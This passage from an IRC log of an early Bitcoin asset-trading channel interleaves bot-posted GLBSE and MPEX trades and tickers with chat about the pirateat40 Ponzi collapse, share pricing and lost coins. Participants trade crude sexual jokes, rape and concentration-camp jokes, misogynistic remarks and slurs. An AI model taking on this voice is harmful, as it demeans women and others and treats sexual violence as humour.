[MOVETO.FUND] 4 @ 1.15386 = 4.6154 BTC [-] Sep 01 23:10:55 [GLBSE] [MOVETO.FUND] 4 @ 1.11 = 4.44 BTC [-] Sep 01 23:11:27 wtf btcmc hasnt paid out yet Sep 01 23:14:02 nef said he was on holiday in chiner Sep 01 23:14:09 [GLBSE] [OBSI.HRPT] 7 @ 0.1036 = 0.7252 BTC [-] Sep 01 23:14:38 so, per his word, i'd imagine he's on his way back to the uk Sep 01 23:16:57 [GLBSE] [TYGRR.BOND-P] 1 @ 0.25134 BTC [-] Sep 01 23:18:01 [GLBSE] [TYGRR.BOND-P] 7 @ 0.25 = 1.75 BTC [-] Sep 01 23:18:03 http://i.imgur.com/bfMkg.gif Sep 01 23:18:23 [GLBSE] [MERGEDMINING] 3 @ 0.08588 = 0.2576 BTC [+] Sep 01 23:19:19 mircea_popescu: I... what. Sep 01 23:19:33 :D Sep 01 23:20:29 [MPEX] [B.MPCD.A] [PAID] 350000 @ 0.00002 = 7 BTC Sep 01 23:21:14 [MPEX] [S.MPOE] 16796 @ 0.00039683 = 6.6652 BTC [-] Sep 01 23:21:15 [MPEX] [S.MPOE] 7800 @ 0.00039567 = 3.0862 BTC [-] Sep 01 23:21:17 [MPEX] [S.MPOE] 28806 @ 0.00039552 = 11.3933 BTC [-] Sep 01 23:21:20 [GLBSE] [BIB.PIRATE] 40 @ 0.2 = 8 BTC [+] Sep 01 23:21:21 [GLBSE] [BIB.PIRATE] 10 @ 0.19 = 1.9 BTC [-] Sep 01 23:21:22 [GLBSE] [BIB.PIRATE] 8 @ 0.18 = 1.44 BTC [-] Sep 01 23:22:22 [MPEX] [B.MPCD.B] [PAID] 400000 @ 0.00003 = 12 BTC Sep 01 23:22:23 [GLBSE] [FOO.PPPPT] 37 @ 0.21 = 7.77 BTC [-] Sep 01 23:22:24 [GLBSE] [FOO.PPPPT] 5 @ 0.2001 = 1.0005 BTC [-] Sep 01 23:22:25 [GLBSE] [FOO.PPPPT] 48 @ 0.2 = 9.6 BTC [-] Sep 01 23:22:26 [GLBSE] [FOO.PPPPT] 28 @ 0.175 = 4.9 BTC [-] Sep 01 23:22:38 [GLBSE] [TYGRR.BOND-P] 1 @ 0.25 BTC [-] Sep 01 23:22:40 [GLBSE] [TYGRR.BOND-P] 46 @ 0.21 = 9.66 BTC [-] Sep 01 23:23:02 < mircea_popescu> http://i.imgur.com/bfMkg.gif << lol, my daughter say that, pointed, laughed and babbled something that sounded like "sucker" Sep 01 23:23:30 [MPEX] [B.MPCD.C] [PAID] 350000 @ 0.00009268 = 32.43671515 BTC Sep 01 23:23:30 I feel that I have done that in my mind before Sep 01 23:23:36 something along the lines of Sep 01 23:23:39 reading forum thread Sep 01 23:23:43 WHAT THE FUCK IS THIS SHIT Sep 01 23:23:44 smickles hahaha Sep 01 23:23:46 goddamned morons Sep 01 23:23:48 Diablo-D3 me too. Sep 01 23:24:21 sort of a mixture of humor and incredulity at the end Sep 01 23:24:30 .py 0.00009268/0.00100000 Sep 01 23:24:32 0.09268 Sep 01 23:24:33 [GLBSE] [TYGRR.BOND-P] 4 @ 0.21 = 0.84 BTC [-] Sep 01 23:24:34 [GLBSE] [TYGRR.BOND-P] 25 @ 0.2 = 5 BTC [-] Sep 01 23:24:35 notsureifserious.jpg kind of shit Sep 01 23:24:36 [GLBSE] [TYGRR.BOND-P] 101 @ 0.180101 = 18.1902 BTC [-] Sep 01 23:24:37 [GLBSE] [TYGRR.BOND-P] 20 @ 0.1801 = 3.602 BTC [-] Sep 01 23:24:38 [GLBSE] [TYGRR.BOND-P] 20 @ 0.1751 = 3.502 BTC [-] Sep 01 23:24:39 [GLBSE] [TYGRR.BOND-P] 116 @ 0.175 = 20.3 BTC [-] Sep 01 23:24:39 [GLBSE] [TYGRR.BOND-P] 100 @ 0.1701001 = 17.01 BTC [-] Sep 01 23:24:40 [GLBSE] [TYGRR.BOND-P] 171 @ 0.111 = 18.981 BTC [-] Sep 01 23:24:41 [GLBSE] [TYGRR.BOND-P] 35 @ 0.10001337 = 3.5005 BTC [-] Sep 01 23:24:42 [GLBSE] [TYGRR.BOND-P] 231 @ 0.1 = 23.1 BTC [-] Sep 01 23:24:43 [GLBSE] [TYGRR.BOND-P] 177 @ 0.1 = 17.7 BTC [-] Sep 01 23:24:49 DOWN THE PIRATE HOLE WE GO Sep 01 23:24:57 Was about time... Sep 01 23:25:04 instead of eating mushrooms and getting bigger Sep 01 23:25:08 cool story bros. Sep 01 23:25:12 you get raped by captain jack sparrow Sep 01 23:25:18 [GLBSE] [TYGRR.BOND-P] 273 @ 0.1 = 27.3 BTC [-] Sep 01 23:25:49 see, now, if pirate was smart, he could have gotten that meme going Sep 01 23:25:53 compared to Facebook BTCST was a good investment..... Sep 01 23:26:18 ZOMG MARK SUCKERBERG IS PIRATE Sep 01 23:26:22 WHY DIDNT I SEE THIS EARLIER Sep 01 23:26:25 LOL Sep 01 23:26:33 mindsplat.gif Sep 01 23:26:34 GLBSE:FB Sep 01 23:26:56 chmod755 facebook only lost like 60% Sep 01 23:27:27 mircea_popescu: but they didn't pay 7% per week Sep 01 23:27:44 no, they added 7% moar accounts per week Sep 01 23:27:47 sweet mpcd payments Sep 01 23:27:49 :D Sep 01 23:27:50 [GLBSE] [FB] 100000000 @ 0.00000001 BTC [-] Sep 01 23:27:54 mpcd ftw! Sep 01 23:28:19 If facebook shares were priced that low, I'd buy them ;) Sep 01 23:28:58 Then motion for adding stupid elements to the design... getting fired any director not thinking my ideas are "brillant" Sep 01 23:29:00 [GLBSE] [FB] 100000000 @ -0.5 BTC [-] Sep 01 23:29:23 BUYBUYBUYBUY Sep 01 23:29:26 what is glbse:fb anyway? Sep 01 23:29:29 lol Sep 01 23:29:38 I want to be paid to destroy facebook =/ Sep 01 23:29:48 smickles: i don't think it exists Sep 01 23:29:55 oh shit Sep 01 23:29:58 you got me Sep 01 23:30:09 :o :D Sep 01 23:30:10 Wow... Sep 01 23:30:18 My fruit fly trap works! Sep 01 23:30:41 [GLBSE] [SMICKLES] 21000000 @ 1 BTC [+] Sep 01 23:30:51 hahaha Sep 01 23:30:59 that's how we do Sep 01 23:31:04 bitches Sep 01 23:31:08 It got filled with fruit flies... now my fruits are left alone! Sep 01 23:31:58 Lol Sep 01 23:32:19 any news from the goatse aka piratedat40? Sep 01 23:32:50 he's marrying into the mad-off family. Sep 01 23:32:59 He's gone. Sep 01 23:33:04 OK, sounds about right Sep 01 23:33:46 ;;ticker Sep 01 23:33:47 Best bid: 10.03, Best ask: 10.04, Bid-ask spread: 0.01000, Last trade: 10.05, 24 hour volume: 37286, 24 hour low: 9.66, 24 hour high: 10.3 Sep 01 23:33:50 so it's decided to be 10 huh. Sep 01 23:35:08 seen the predictinator? Sep 01 23:35:31 I like 10, good price to be stable at Sep 01 23:36:01 lol @ https://bitcointalk.org/index.php?topic=103020.0 Sep 01 23:36:07 btcmc paid out Sep 01 23:36:23 I think bitcoins now finally got from drugs/hacking > gambling/porn main usage Sep 01 23:36:32 Which is one step closer to mainstream usage Sep 01 23:36:36 BTC-Mining i agree. Sep 01 23:36:40 well Sep 01 23:36:42 the thing with that is Sep 01 23:36:51 we really need MORE dickchick porn? Sep 01 23:36:56 isnt that market already quite saturated? Sep 01 23:36:58 BTC-Mining: the next step is a real brothel accepting BTC Sep 01 23:37:15 [GLBSE] [FOO.PPPPT] 1 @ 0.15 BTC [-] Sep 01 23:37:20 I mean, look at japan, every chick over there has a dick Sep 01 23:37:22 its their thing Sep 01 23:37:45 and when its not a dick, its an alien tentacle that lives in a symbiotic relationship Sep 01 23:38:30 [MPEX] [S.MPOE] 1383 @ 0.00039552 = 0.547 BTC [-] Sep 01 23:38:31 [MPEX] [S.MPOE] 21415 @ 0.00039536 = 8.4666 BTC [-] Sep 01 23:38:32 [MPEX] [S.MPOE] 23778 @ 0.00039492 = 9.3904 BTC [-] Sep 01 23:38:49 BTC-Mining: the next step is a real brothel accepting BTC <<< no, the next step is pr0n on the exchanges :D Sep 01 23:39:00 omg i r lead into future! Sep 01 23:40:40 not for long my friend... Sep 01 23:40:57 yeah really Sep 01 23:41:04 I read about bitcoin in a fucking novel like 20 years ago Sep 01 23:41:05 Sep01 20:41:02 mtpr0n 40 PRN @ 0.2 BTC Sep 01 23:41:18 Which one was that? Sep 01 23:41:24 you know, I forget Sep 01 23:41:40 Ive read so much shit over the years it starts to blur together Sep 01 23:42:07 i creted bitcoin during a pre-pubescent orgasm Sep 01 23:42:39 jcpham: jerking off infront of your mining rigs is disgusting Sep 01 23:42:51 rigophilia Sep 01 23:42:55 [16:40] not for long my friend... Sep 01 23:42:55 he cools them that way. Sep 01 23:43:21 mircea_popescu, by that I mean people will be expecting more professionalism from mpex Sep 01 23:43:28 I read about mtgox ~30 years ago Sep 01 23:43:31 You should move it to it's own domain Sep 01 23:43:33 people can expect whatever the fuck they want. Sep 01 23:43:38 i got the buttons i make the rules. Sep 01 23:43:42 oh right Sep 01 23:43:43 and i expect people to adapt. Sep 01 23:43:43 durrr Sep 01 23:43:46 I know what novel it was Sep 01 23:43:50 cryptonomicon Sep 01 23:44:04 Diablo-D3: no, it was about Magic The Gathering Sep 01 23:44:09 lol Sep 01 23:44:10 that was 1999 Sep 01 23:44:20 BTC-Mining: http://mpex.us Sep 01 23:44:45 mircea_popescu: was it? Sep 01 23:44:49 it feels older than that Sep 01 23:44:52 yaaa, recent-ish Sep 01 23:45:13 what? Why don't you have MPex directly on mpex.us? Sep 01 23:45:27 why redirect it to polimedia.us subfolder? Sep 01 23:45:36 BTC-Mining it's on mpoe.org really... Sep 01 23:46:10 fucking english ambiguity Sep 01 23:46:17 i do it all the time diablo Sep 01 23:46:24 my mom never mminds Sep 01 23:46:33 you live with your mom ? Sep 01 23:46:57 she watches? i'm sure there is money in filming that Sep 01 23:47:30 smickles : only if he's a girl. (ref http://polimedia.us/dtng/c/res/5460.html ) Sep 01 23:47:36 [GLBSE] [FPGAMINING] 10 @ 0.8489 = 8.489 BTC [+] Sep 01 23:47:36 There's money for everything Sep 01 23:48:01 i wonder if icoul place her between the to rigs Sep 01 23:48:08 and some how hover above Sep 01 23:48:25 plasma! Sep 01 23:48:43 i'd need magnets too of course Sep 01 23:50:38 and a domain name Sep 01 23:50:44 all businesses start with a domain name. Sep 01 23:52:55 anyway, on a more serious note : there's ~24 hours left during which you can buy MPOE bonds that'll go in September. Sep 01 23:53:10 last call is midnight gmt tomorrow. Sep 01 23:54:27 [GLBSE] [TYGRR.BOND-P] 150 @ 0.1 = 15 BTC [-] Sep 01 23:56:18 down the hole, down the hole goes the PPT Sep 01 23:56:59 100 0.076 200 0.07501001 Sep 01 23:57:04 seems kinda hopeless. Sep 01 23:57:26 730 1.05 500 1.05 1550 1.067999 << i like these tho. Sep 02 00:01:10 [MPEX] [S.MPOE] 2700 @ 0.00039781 = 1.0741 BTC [+] Sep 02 00:01:11 [MPEX] [S.MPOE] 44354 @ 0.0004021 = 17.8347 BTC [+] Sep 02 00:01:12 [MPEX] [S.MPOE] 5846 @ 0.00040217 = 2.3511 BTC [+] Sep 02 00:03:04 [GLBSE] [FPGAMINING] 1 @ 0.849 BTC [+] Sep 02 00:03:08 mircea_popescu: that 730 1.05, is that someone wanting a mpbor @ 105%? Sep 02 00:04:32 [GLBSE] [FPGAMINING] 8 @ 0.849 = 6.792 BTC [+] Sep 02 00:05:04 [GLBSE] [FPGAMINING] 5 @ 0.84969898 = 4.2485 BTC [+] Sep 02 00:05:18 smickles um where that ? Sep 02 00:05:40 o o , i was quoting the asks list on the pirate pt. Sep 02 00:05:48 people are trying to get 1 bitcoin per. Sep 02 00:05:53 [GLBSE] [FPGAMINING] 2 @ 0.84969899 = 1.6994 BTC [+] Sep 02 00:05:55 [GLBSE] [FPGAMINING] 5 @ 0.849699 = 4.2485 BTC [+] Sep 02 00:05:56 [GLBSE] [FPGAMINING] 4 @ 0.8498 = 3.3992 BTC [+] Sep 02 00:05:57 [GLBSE] [FPGAMINING] 1 @ 0.84999999 BTC [+] Sep 02 00:06:42 mircea_popescu: oh Sep 02 00:06:49 i had no clue Sep 02 00:06:51 [GLBSE] [FPGAMINING] 2 @ 0.84999999 = 1.7 BTC [+] Sep 02 00:07:19 [GLBSE] [FDBF] 1 @ 0.1499999 BTC [+] Sep 02 00:07:34 [GLBSE] [FPGAMINING] 1 @ 0.84999999 BTC [+] Sep 02 00:07:50 mircea_popescu: why don't you use css? Sep 02 00:08:14 [GLBSE] [OBSI.HRPT] 1 @ 0.1036 BTC [-] Sep 02 00:08:40 why don't i ? that's a backwards question Sep 02 00:08:44 why don't you drive a van Sep 02 00:09:01 -.- Sep 02 00:09:07 mircea_popescu: why doesn't css use you? Sep 02 00:09:13 LOL Sep 02 00:09:17 lol Sep 02 00:09:23 obsi, you ARE a girl aren't you. Sep 02 00:09:29 just a lil Sep 02 00:09:29 mircea_popescu: seriously....it looks like http://www.encyclopediabitcoinica.com/mpex/INDEX.HTML Sep 02 00:09:50 ajhahaha Sep 02 00:09:59 check out the HTML Sep 02 00:10:09 ajahaha Sep 02 00:10:22 needs a MaDe WITH DrEaMVIeWer Sep 02 00:10:46 MADE WITH MICROSOFT WORD 95 Sep 02 00:10:58 actually it's made in vim mostly. Sep 02 00:11:00 [GLBSE] [KRAKEN] 40 @ 0.01 = 0.4 BTC [+] Sep 02 00:12:52 [GLBSE] [BIB.PIRATE] 75 @ 0.135 = 10.125 BTC [-] Sep 02 00:13:00 [GLBSE] [TYGRR.BOND-P] 60 @ 0.1000001 = 6 BTC [+] Sep 02 00:13:02 [GLBSE] [TYGRR.BOND-P] 300 @ 0.1 = 30 BTC [-] Sep 02 00:13:03 [GLBSE] [TYGRR.BOND-P] 280 @ 0.09 = 25.2 BTC [-] Sep 02 00:13:09 [GLBSE] [UDN] 33 @ 0.099999 = 3.3 BTC [-] Sep 02 00:13:18 [GLBSE] [KRAKEN] 500 @ 0.01 = 5 BTC [+] Sep 02 00:14:00 [GLBSE] [SILKROAD] 8738 @ 2.09 = 18262.42 BTC [+] Sep 02 00:14:30 wtf is KRAKEN Sep 02 00:15:15 BTC-Mining's thing neh ? Sep 02 00:15:29 a harnett passthrough Sep 02 00:17:02 chmod755 : mpoe-pr sez you need some http://theoatmeal.com/comics/design_hell Sep 02 00:19:42 now that's funny https://twitter.com/CryptoCoinMedia/status/241491259003387904 Sep 02 00:21:35 [GLBSE] [TYGRR.BOND-P] 30 @ 0.13 = 3.9 BTC [+] Sep 02 00:21:37 [GLBSE] [GSDPT] 118 @ 0.0033998 = 0.4012 BTC [+] Sep 02 00:23:39 Yeah, harnet passthrough Sep 02 00:25:17 [GLBSE] [FPGAMINING] 2 @ 0.84999999 = 1.7 BTC [+] Sep 02 00:25:19 [GLBSE] [FPGAMINING] 8 @ 0.85 = 6.8 BTC [+] Sep 02 00:25:24 [GLBSE] [FPGAMINING] 33 @ 0.85 = 28.05 BTC [+] Sep 02 00:26:27 [GLBSE] [MOVETO.FUND] 2 @ 1.1349 = 2.2698 BTC [+] Sep 02 00:29:36 [GLBSE] [TYGRR.BOND-P] 50 @ 0.15 = 7.5 BTC [+] Sep 02 00:41:18 [GLBSE] [ASICMINER] 1 @ 0.1097999 BTC [-] Sep 02 00:41:40 [GLBSE] [FUTUREFUND] 1500 @ 0.000121 = 0.1815 BTC [+] Sep 02 00:42:46 [GLBSE] [OBSI.HRPT] 290 @ 0.10359 = 30.0411 BTC [-] Sep 02 00:43:12 lol Sep 02 00:48:19 [MPEX] [S.MPOE] 42309 @ 0.00039979 = 16.9147 BTC [-] Sep 02 00:48:41 [MPEX] [S.MPOE] 560 @ 0.00039979 = 0.2239 BTC [-] Sep 02 00:48:42 [MPEX] [S.MPOE] 6200 @ 0.00039973 = 2.4783 BTC [-] Sep 02 00:49:44 [GLBSE] [JAH] 2 @ 0.15 = 0.3 BTC [-] Sep 02 00:55:30 TYGRR.BOND-P owners have to wait now :( Sep 02 00:55:49 @pirateat40 | The PPT that didn't' comply will have a long road ahead. Those that contacted me ahead of time "Friday" are clear. Sep 02 00:55:51 @pirateat40 | I'm wanted to speak for awhile now, but I someone stole my ship. Sep 02 00:55:53 @pirateat40 | Finally things are progressing and I've returned to my boat. Sep 02 00:55:55 @pirateat40 | It's going to get better to some, I promise. Sep 02 00:55:57 @pirateat40 | That's all for now, back to your regularly scheduled trolling. Sep 02 00:55:59 Sep 02 00:56:15 "are clear" Sep 02 00:56:31 i bet it's meaningless at the moment Sep 02 00:56:34 lalala. despicable scammer is trying to manipulate people still. Sep 02 00:56:44 im so curious who is stupid enough to fall for the shit. Sep 02 00:56:51 no idea Sep 02 00:57:16 lets see will there be any payments actually confirmed Sep 02 00:57:17 i'm sure there will be some idiots found. desperate to prove it's not that they made a mistake "investying" in a ponzi Sep 02 00:57:28 but moreover that they really are too stupid to have money in the first place. Sep 02 00:58:27 i did feel like shit for a second but then i realized, this is just meaningless crapp from pirateat40 Sep 02 00:58:35 right. Sep 02 00:58:50 [GLBSE] [HYDRO.BONDS] 1 @ 1.59889 BTC [+] Sep 02 00:58:57 unless I see some other PPT's pay out or zeros Sep 02 00:59:15 even if all pay out right now except one Sep 02 00:59:18 he's still 100% in default. Sep 02 00:59:21 HE. Sep 02 01:00:02 [GLBSE] [BIB.PIRATE] 10 @ 0.245 = 2.45 BTC [+] Sep 02 01:02:48 [GLBSE] [HYDRO.BONDS] 2 @ 1.59889 = 3.1978 BTC [+] Sep 02 01:03:02 [GLBSE] [GSDPT] 30 @ 0.0033998 = 0.102 BTC [+] Sep 02 01:03:22 [GLBSE] [CPA] 4 @ 0.09 = 0.36 BTC [+] Sep 02 01:06:01 right, like he's going to pay any large account... Sep 02 01:06:54 you know, the ones that were going to be paid first, starting on the 17th Sep 02 01:07:45 yeah Sep 02 01:07:48 [GLBSE] [OBSI.HRPT] 3 @ 0.10359 = 0.3108 BTC [-] Sep 02 01:08:52 [GLBSE] [OBSI.HRPT] 1 @ 0.10359 BTC [-] Sep 02 01:08:57 unavoidable tho, from a statistical perspective. as long as idiots hold bitcoins there's going to be scammers trying to save that money. Sep 02 01:09:00 [GLBSE] [HYDRO.BONDS] 1 @ 1.59889 BTC [+] Sep 02 01:09:15 because money can't fucking stand being stuck with idiots. much like women. Sep 02 01:10:23 [MPEX] [S.MPOE] 24022 @ 0.00039492 = 9.4868 BTC [-] Sep 02 01:10:24 [MPEX] [S.MPOE] 6436 @ 0.00039473 = 2.5405 BTC [-] Sep 02 01:10:26 [MPEX] [S.MPOE] 842 @ 0.0003934 = 0.3312 BTC [-] Sep 02 01:10:26 [GLBSE] [ASICMINER] 4 @ 0.109799 = 0.4392 BTC [-] Sep 02 01:10:39 [GLBSE] [OBSI.HRPT] 4 @ 0.10359 = 0.4144 BTC [-] Sep 02 01:11:09 [MPEX] [B.MPCD.C] 8500 @ 0.001028 = 8.738 BTC [-] Sep 02 01:17:51 [MPEX] [O.BTCUSD.C100T] 311 @ 0.19360978 = 60.2126 BTC [-] Sep 02 01:17:56 [MPEX] [O.BTCUSD.P100T] 21 @ 0.17 = 3.57 BTC [+] Sep 02 01:17:58 [MPEX] [O.BTCUSD.P100T] 290 @ 0.19360978 = 56.1468 BTC [+] Sep 02 01:20:27 [MPEX] [F.GIGA.ETF] 1200 @ 0.00089531 = 1.0744 BTC [-] Sep 02 01:21:32 [GLBSE] [RAREEARTH] 1 @ 0.00901 BTC [-] Sep 02 01:23:38 [GLBSE] [OBSI.HRPT] 29 @ 0.103 = 2.987 BTC [-] Sep 02 01:27:16 [GLBSE] [BTC-MINING] 14 @ 0.96999 = 13.5799 BTC [+] Sep 02 01:28:29 sgornick https://bitcointalk.org/index.php?topic=105160.msg1151078#msg1151078 nice write-up. Sep 02 01:28:47 BTC-MINING, that's the good stuff Sep 02 01:29:41 [GLBSE] [FPGAMINING] 4 @ 0.8006 = 3.2024 BTC [-] Sep 02 01:29:42 [GLBSE] [FPGAMINING] 21 @ 0.8005 = 16.8105 BTC [-] Sep 02 01:29:44 [GLBSE] [FPGAMINING] 2 @ 0.80015 = 1.6003 BTC [-] Sep 02 01:29:47 The dept. of redundancy department :D Sep 02 01:30:35 dont worry, that was just me Sep 02 01:37:12 >flying dutchman bitcoin fund Sep 02 01:37:17 :3 Sep 02 01:37:59 !ticker btc-mining Sep 02 01:38:01 [GLBSE:BTC-MINING] [Bid: 0.9] [Ask: 0.96999] [Spread: 0.06999] [Last: 0.96999] [24hVol: 18.42981] [7dAvg: 0.96263133] Sep 02 01:38:02 !ticker btcmc Sep 02 01:38:05 [GLBSE:BTCMC] [Bid: 0.4] [Ask: 0.58] [Spread: 0.18] [Last: 0.40000002] [24hVol: 1.20000006] [7dAvg: 0.46278571] Sep 02 01:38:05 !ticker obsi.abmo Sep 02 01:38:08 !ticker asicminer Sep 02 01:38:08 [GLBSE:OBSI.ABMO] [Bid: 0.05] [Ask: 0.085] [Spread: 0.035] [Last: 0.085] [24hVol: ] [7dAvg: 0.07954545] Sep 02 01:38:11 [GLBSE:ASICMINER] [Bid: 0.10000001] [Ask: 0.109699] [Spread: 0.00969899] [Last: 0.109799] [24hVol: 46.13852861] [7dAvg: 0.10436476] Sep 02 01:41:51 [GLBSE] [TYGRR.BOND-P] 1 @ 0.19 BTC [+] Sep 02 01:41:52 [GLBSE] [TYGRR.BOND-P] 1 @ 0.2 BTC [+] Sep 02 01:41:53 [GLBSE] [TYGRR.BOND-P] 1 @ 0.21 BTC [+] Sep 02 01:41:54 [GLBSE] [TYGRR.BOND-P] 1 @ 0.22 BTC [+] Sep 02 01:41:55 [GLBSE] [TYGRR.BOND-P] 1 @ 0.23 BTC [+] Sep 02 01:41:56 [GLBSE] [TYGRR.BOND-P] 1 @ 0.24 BTC [+] Sep 02 01:41:58 [GLBSE] [TYGRR.BOND-P] 1 @ 0.25 BTC [+] Sep 02 01:41:59 [GLBSE] [TYGRR.BOND-P] 1 @ 0.26 BTC [+] Sep 02 01:42:00 [GLBSE] [TYGRR.BOND-P] 1 @ 0.27 BTC [+] Sep 02 01:42:01 [GLBSE] [TYGRR.BOND-P] 1 @ 0.28 BTC [+] Sep 02 01:42:04 wtf is that shit Sep 02 01:42:12 I have no clue Sep 02 01:42:16 There's a retarded someone, somewhere Sep 02 01:42:56 [GLBSE] [TYGRR.BOND-P] 1 @ 0.29 BTC [+] Sep 02 01:42:57 [GLBSE] [TYGRR.BOND-P] 9 @ 0.295 = 2.655 BTC [+] Sep 02 01:43:12 lol Sep 02 01:43:15 lol Sep 02 01:43:22 bitcoin assets are even more nutty than bitcoin itself Sep 02 01:43:34 [GLBSE] [TYGRR.BOND-P] 4 @ 0.295 = 1.18 BTC [+] Sep 02 01:43:48 BTC-Mining: what do you think will happen to the usd/btc price when the difficulty goes up and or asics hit the scene Sep 02 01:43:54 nutty flavr. Sep 02 01:43:59 BTC ^^^ Sep 02 01:44:36 There's more adoption, coins go down the drain regularly from lost/forgotten wallets, lowering generation rate... Sep 02 01:44:52 and the usage of bitcoin is on the rise Sep 02 01:45:03 I can only see this bodding well for bitcoins Sep 02 01:45:11 i wonder what will be the absolute peak of bitcoin in circulation Sep 02 01:45:17 clearly won't be 21mn. maybe 20mn ? Sep 02 01:45:21 or already more than 1mn lost ? Sep 02 01:45:28 Id be surprised if it made it 20m lol Sep 02 01:45:32 exactly,so many lost Sep 02 01:45:35 maybe, yea... Sep 02 01:48:27 heh Sep 02 01:51:23 [GLBSE] [NYAN.B] 5 @ 1.02 = 5.1 BTC [+] Sep 02 01:51:52 Don't forget it's been mining with stability at 50 BTC every ~10 minutes since like some date in 2009 Sep 02 01:51:56 [GLBSE] [OBSI.HRPT] 10 @ 0.10359 = 1.0359 BTC [+] Sep 02 01:52:14 at close to 3 million per years Sep 02 01:52:26 and they were worth fractions of cents back then Sep 02 01:52:44 yeah. Sep 02 01:52:46 I'm sure people deleted plenty of 50-1000 BTC wallet during that time Sep 02 01:52:53 pretty sure, yea. Sep 02 01:53:06 [MPEX] [F.GIGA.ETF] 4386 @ 0.00089256 = 3.9148 BTC [-] Sep 02 01:53:06 Which is very funny considering their current worth... Sep 02 01:53:07 [MPEX] [F.GIGA.ETF] 3701 @ 0.00090321 = 3.3428 BTC [+] Sep 02 01:53:08 [MPEX] [F.GIGA.ETF] 13659 @ 0.00090384 = 12.3456 BTC [+] Sep 02 01:53:27 maybe the satoshi guy went "well... if i make it be 20ish mil for sure there will be 10mn left" Sep 02 01:53:38 [GLBSE] [V.HRL] 5 @ 1 = 5 BTC Sep 02 01:53:49 https://bitcointalk.org/index.php?topic=77469.msg1153179#msg1153179 Sep 02 01:54:12 Happy Dividend Day! Sep 02 01:54:12 Shares sold to date: 20909 Sep 02 01:54:12 Dividends paid out today: 0.0 BTC Sep 02 01:54:14 what a gyp. Sep 02 01:54:21 [GLBSE] [JTME] 1 @ 0.944 BTC [-] Sep 02 01:54:23 [GLBSE] [JTME] 4 @ 0.9448 = 3.7792 BTC [+] Sep 02 01:54:44 [GLBSE] [GSDPT] 33 @ 0.0033996 = 0.1122 BTC [-] Sep 02 01:55:38 mircea_popescu: how so? Sep 02 01:55:44 you cant be angry, the motion was passed. Sep 02 01:56:26 im not angry or invested, im just saying it sounds... like a nazi work camp Sep 02 01:56:51 a lot of people wish to see DMC succeed Sep 02 01:57:02 this will work greatly towards that goal Sep 02 01:57:43 What the hell... Sep 02 01:58:25 One day you're trading 1 ASICMINER for 10 DMC, 2 weeks later you're asking for 10 ASICMINER for 3 DMC? Sep 02 01:58:37 new month, BTC-Mining Sep 02 01:58:56 yeah, but those trades rates are completly arbitrary Sep 02 01:59:04 lol, A:"it sounds like a death camp" B:"that's the goal we're working towards" Sep 02 01:59:04 they're set by market factors. Sep 02 01:59:25 smickles: yes, we're killing the competition Sep 02 01:59:44 3J Sep 02 01:59:44 lol "market factors" Sep 02 01:59:49 what market factors, comrade ? Sep 02 01:59:50 and besides, my father died at a concentration camp Sep 02 01:59:54 your politbureau ? Sep 02 01:59:55 er grandfather Sep 02 02:00:10 (and I assume everyone here knows the punchline to this joke) Sep 02 02:00:27 heh, prolly Sep 02 02:00:43 "I'm sorry to hear that!" "yeah, he fell out of a guard tower" Sep 02 02:00:53 getting back to the market forces. Sep 02 02:00:54 although, you could put a spin on it Sep 02 02:01:10 died of untreated vd caught from raping some of the women Sep 02 02:01:41 this is the winter of our discount tent. Sep 02 02:01:47 vd doesn't kill smickles Sep 02 02:01:56 mircea_popescu: say that to al capone Sep 02 02:02:03 syph can end in death, can't it mircea_popescu ? Sep 02 02:02:05 is the us govt vd now ? Sep 02 02:02:08 i can see that point. Sep 02 02:02:18 smickles in that sense a bunion can end in death, takes so damn long... Sep 02 02:02:28 but syphillis usually causes dementia, not death. Sep 02 02:02:30 it was a lot of rape Sep 02 02:02:33 in...35 years. Sep 02 02:02:33 al capone died in prison from an untreated std Sep 02 02:02:38 after being arrested for tax fraud. Sep 02 02:02:54 Diablo-D3 yes, because life in prison is representative. Sep 02 02:03:48 as far as unprotected sex goes, isnt it? Sep 02 02:04:08 Diablo, the thing with your trading chart is, it doesn't make sense... one day you trade them for far less then their current worth, shares go down in value. The next, you ask for like 20-100x their current value to trade... what the fuck. Sep 02 02:04:20 new month, BTC-Mining Sep 02 02:04:20 BTC-Mining: today is the first. Sep 02 02:04:37 unless an emergency update happens, it changes on the first Sep 02 02:04:47 o i see, emergency update. Sep 02 02:04:50 In what does the fact it's a new month justify those rates? Sep 02 02:04:55 i think Diablo-D3 is basically cosmo kramer. Sep 02 02:04:56 +-0\] Sep 02 02:05:04 At those trading rates, ain't worth trading any shares Sep 02 02:05:05 BTC-Mining: er, seriously? today is dmc dividend day Sep 02 02:05:25 Diablo-D3 you know you have to offer both bid and ask to be a market maker. Sep 02 02:05:35 at what rate of dmc shares will you give me an asicminer share ? Sep 02 02:05:36 YES, IT IS, I UNDERSTAND THAT! Sep 02 02:05:49 BTC-Mining: so whats the issue? Sep 02 02:05:55 I want to know HOW you get those TRADING RATES Sep 02 02:06:01 not why you changed them today Sep 02 02:06:01 I value DMC shares independently of the market. Sep 02 02:06:14 Diablo-D3 right. so how many dmc shares i need to give you to get an asicminer share ? Sep 02 02:06:27 mircea_popescu: you want to buy asicminer from me? Sep 02 02:06:29 yes. Sep 02 02:06:40 earsex Sep 02 02:06:42 But how do you value them. How do you calculate their current "worth" Sep 02 02:06:42 i want to return your useless paper in exchange for something else. how many of your shares do i need ? Sep 02 02:06:51 mircea_popescu: twice the reverse of the ratio on the chart. Sep 02 02:06:58 twice the who ? Sep 02 02:07:21 Sep 02 02:07:23 the chart currently reads 10 asicminer for 3 dmc. You'd have to give me 6 dmc to get 10 asicminer. Sep 02 02:07:48 [GLBSE] [DMC] 50 @ 0.06799 = 3.3995 BTC [+] Sep 02 02:07:50 [GLBSE] [DMC] 245 @ 0.06799 = 16.6576 BTC [+] Sep 02 02:07:50 [GLBSE] [DMC] 84 @ 0.06799999 = 5.712 BTC [+] Sep 02 02:07:51 [GLBSE] [DMC] 4 @ 0.07 = 0.28 BTC [+] Sep 02 02:07:53 [GLBSE] [DMC] 2 @ 0.074 = 0.148 BTC [+] Sep 02 02:07:54 [GLBSE] [DMC] 100 @ 0.07998999 = 7.999 BTC [+] Sep 02 02:07:55 [GLBSE] [DMC] 5 @ 0.085 = 0.425 BTC [+] Sep 02 02:07:56 10 for 3. so you give me 10 asicminer for 6 dmc ? Sep 02 02:07:57 haha Sep 02 02:08:00 lol Sep 02 02:08:09 fucker I was just about to buy those Sep 02 02:08:14 mircera arbing? Sep 02 02:08:17 !ticker asicminer Sep 02 02:08:20 !ticker dmc Sep 02 02:08:33 [GLBSE:ASICMINER] [Bid: 0.10000001] [Ask: 0.109699] [Spread: 